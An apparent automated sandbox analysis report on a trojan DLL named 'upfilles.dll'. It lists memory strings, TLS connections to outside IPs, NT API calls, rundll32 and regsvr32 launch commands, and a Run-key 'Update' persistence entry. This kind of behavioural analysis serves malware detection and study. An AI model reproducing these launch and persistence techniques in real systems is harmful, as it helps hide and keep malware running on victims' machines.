                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownHTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort,6_2_00000001800012B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort,6_2_0000000180001490
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_0000000180001650
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_000002921300D31C NtProtectVirtualMemory,18_3_000002921300D31C
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_000002921300D2AC NtAllocateVirtualMemory,18_3_000002921300D2AC
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6814 NtFreeVirtualMemory,22_2_013A6814
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A958C NtAllocateVirtualMemory,22_2_013A958C
                      Source: C:\Windows\explorer.exeCode function: 22_2_013AA5CC NtDelayExecution,22_2_013AA5CC
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6728 NtWriteFile,22_2_013A6728
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile,22_2_013A6618
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose,22_2_013A650C
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose,22_2_013A6464
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A67A0 NtClose,22_2_013A67A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C0306_2_000000018001C030
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000A0406_2_000000018000A040
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800190AC6_2_00000001800190AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800019506_2_0000000180001950
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000B9926_2_000000018000B992
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800131E06_2_00000001800131E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E2006_2_000000018000E200
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000B2106_2_000000018000B210
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800192B86_2_00000001800192B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180020B886_2_0000000180020B88
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180004C006_2_0000000180004C00
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800134486_2_0000000180013448
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C45C6_2_000000018001C45C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000C4806_2_000000018000C480
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EC906_2_000000018001EC90
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800154A06_2_00000001800154A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800235846_2_0000000180023584
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800176FC6_2_00000001800176FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000292116E254C18_2_00000292116E254C
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000000026E7DFB4C18_2_000000026E7DFB4C
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A103022_2_013A1030
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                      Source: upfilles.dll.dllBinary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@32/17@8/6
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next,18_3_00007DF4F0240000
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000AEB0 CoCreateInstance,6_2_000000018000AEB0
                      Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
                      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8Jump to behavior
                      Source: upfilles.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: upfilles.dll.dllReversingLabs: Detection: 15%
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNowJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObjectJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstallJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNowJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObjectJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstallJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stowJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stowJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stowJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: upfilles.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: upfilles.dll.dllStatic PE information: real checksum: 0x491bb should be: 0x85fc5
                      Source: upfilles.dll.dllStatic PE information: section name: hVr
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180006138 push E8000020h; iretd 6_2_000000018000613D
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000292116A5BB0 push r15; ret 18_2_00000292116A5BB5
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000000026E7A31B0 push r15; ret 18_2_000000026E7A31B5
                      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023584 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0000000180023584
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
